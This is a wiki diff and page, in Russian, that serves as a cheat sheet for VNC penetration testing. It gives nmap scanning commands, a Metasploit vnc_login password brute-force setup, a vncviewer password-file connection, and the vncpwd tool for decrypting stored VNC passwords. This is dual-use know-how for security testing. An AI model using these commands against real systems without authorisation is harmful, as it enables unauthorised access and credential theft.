Vnc all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м (→Атаки) |
Drakylar (обсуждение | вклад) м (→Статьи) |
||
| (не показаны 3 промежуточные версии этого же участника) | |||
| Строка 1: | Строка 1: | ||
=Поиск= | =Поиск= | ||
| + | |||
| + | ==Все в одном== | ||
| + | |||
| + | ===vncpwn=== | ||
| + | |||
| + | https://github.com/hegusung/VNCPwn | ||
| + | |||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | python vncpwn.py | ||
| + | </syntaxhighlight> | ||
| + | |||
==Порт и версия== | ==Порт и версия== | ||
| Строка 41: | Строка 52: | ||
===vncpwd=== | ===vncpwd=== | ||
| + | |||
| + | https://github.com/jeroennijhof/vncpwd | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| Строка 49: | Строка 62: | ||
[https://www.hackingarticles.in/vnc-penetration-testing/ Туториал по тестированию VNC] | [https://www.hackingarticles.in/vnc-penetration-testing/ Туториал по тестированию VNC] | ||
| + | |||
| + | [https://book.hacktricks.xyz/pentesting/pentesting-vnc Хороший туториал] | ||
Текущая версия на 13:03, 30 апреля 2020
Содержание
Поиск
Все в одном
vncpwn
https://github.com/hegusung/VNCPwn
python vncpwn.pyПорт и версия
NMAP
nmap -p 5901 --script vnc-info target
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p port targetПроверка подключния
vncviewer
vncviewer target:5901Атаки
Перебор паролей
vnc_login
use auxiliary/scanner/vnc/vnc_login
set rhosts target
set rport 5901
set pass_file pass.txt
runvncviewer
vncviewer [-passwd passwd.txt] target::5901Расшифровка /.vnc/passwd
vncpwd
https://github.com/jeroennijhof/vncpwd
vncpwd _file_